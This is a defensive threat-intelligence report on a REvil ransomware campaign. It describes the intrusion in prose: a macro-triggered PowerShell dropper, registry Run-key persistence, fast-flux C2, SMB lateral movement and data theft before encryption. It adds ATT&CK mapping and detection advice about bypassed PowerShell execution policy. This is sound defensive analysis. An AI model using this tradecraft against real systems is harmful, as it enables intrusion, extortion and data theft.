Nina Kovacs — Exploit Research Analyst
Key Takeaways
- REvil employs advanced evasion techniques during execution, utilizing T1059.001 – PowerShell for command execution.
- The group demonstrates persistence through registry modifications at
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. - Command and Control infrastructure shows dynamic DNS patterns to obfuscate origins, complicating detection efforts.
Executive Summary
Our analysis of a recent REvil ransomware attack revealed a sophisticated execution chain relying on PowerShell scripts and advanced evasion tactics. The malware leveraged various TTPs (Tactics, Techniques, and Procedures) to establish persistence and maintain foothold in compromised environments. Through the deployment of a dropper executable, the actors facilitated lateral movement and data exfiltration before deploying the ransomware payload, culminating in a significant impact on targeted organizations.
Initial Access
During our investigation, we observed that the initial access vector of this REvil campaign was primarily via phishing emails containing malicious attachments. Analysis of the email headers revealed a lack of DKIM and SPF protection, indicating that the emails could have been spoofed. The attached document, once enabled with macros, executed a Base64 encoded PowerShell command, initiating the infection. This technique aligns with the T1203 – Exploitation for Client Execution tactic, enabling the attackers to gain code execution on the victim’s machine effortlessly.
Execution & Persistence
Following the initial execution, the PowerShell script acted as a dropper, downloading additional payloads from the actor’s command and control server. We noted that the file was saved to C:\Users\Public\Documents\system.exe, a common location used to obfuscate malicious activities. As part of the persistence method, the analysis revealed alterations within the registry at HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\System, ensuring that the malware would execute upon user logon, thereby maintaining its foothold between reboots.
Command and Control
The command and control (C2) infrastructure used in this operation exhibited a high level of obfuscation. The C2 domains were dynamically generated with frequent changes, utilizing legitimate cloud services for hosting the payloads. This tactic is indicative of T1071.001 – Application Layer Protocol: Web Protocols, allowing REvil’s operators to blend their traffic with regular HTTP/HTTPS requests, making detection by perimeter defenses challenging. During monitoring of the network traffic, we identified traffic to domains such as abc123.hostingprovider.com, which resolved through a fast-flux DNS technique to prevent tracking and takedown.
Lateral Movement & Discovery
Our investigation highlighted the actors’ proficiency in lateral movement, as they employed T1021.002 – Remote Services: SMB/Windows Admin Shares to propagate the infection across the network. This was achieved using credential harvesting techniques to obtain legitimate user credentials, allowing them to access additional machines without triggering security alarms. We also noted the execution of powershell.exe -ExecutionPolicy Bypass commands to enumerate active directory accounts and assess the network topology using Windows Management Instrumentation (WMI) methods.
Impact & Objectives
The primary objective of the REvil campaign, as evidenced by the final payload deployment, was to encrypt and extort sensitive data from the victims. The ransomware used robust encryption algorithms, rendering files inaccessible without a decryption key. Post-infection, the attackers executed data exfiltration scripts, sending sensitive information to their C2 servers prior to encryption. Notably, the ransom note contained specific instructions on payment methods, often leveraging cryptocurrencies, reflecting a calculated approach to maximize financial gain while minimizing traceability.
MITRE ATT&CK Mapping
- T1203 – Exploitation for Client Execution: Used to exploit vulnerabilities in software for initial access via office documents.
- T1059.001 – PowerShell: Employed for executing commands and scripts as part of the payload installation and persistence.
- T1071.001 – Application Layer Protocol: Web Protocols: Utilized for C2 communication over HTTPS, contributing to the stealthy nature of the operation.
- T1021.002 – Remote Services: SMB/Windows Admin Shares: Leveraged for lateral movement in the network.
Detection Opportunities
- Implement EDR solutions capable of monitoring for suspicious PowerShell activity, particularly invocation of
powershell.exewith -ExecutionPolicy Bypass. - Regularly audit Windows registry entries for unauthorized modifications to startup entries.
- Utilize network traffic analysis tools to flag unusual DNS resolution patterns and establish baselines for normal outbound connections.
Analyst Notes
The REvil group’s relentless evolution necessitates continuous monitoring and adaptive response strategies. Analysts must focus on understanding the changes in toolsets and tactics employed by such actors to effectively mitigate risks. Regular awareness training and phishing simulations can significantly enhance an organization’s security posture against such threats.
Source: Original Report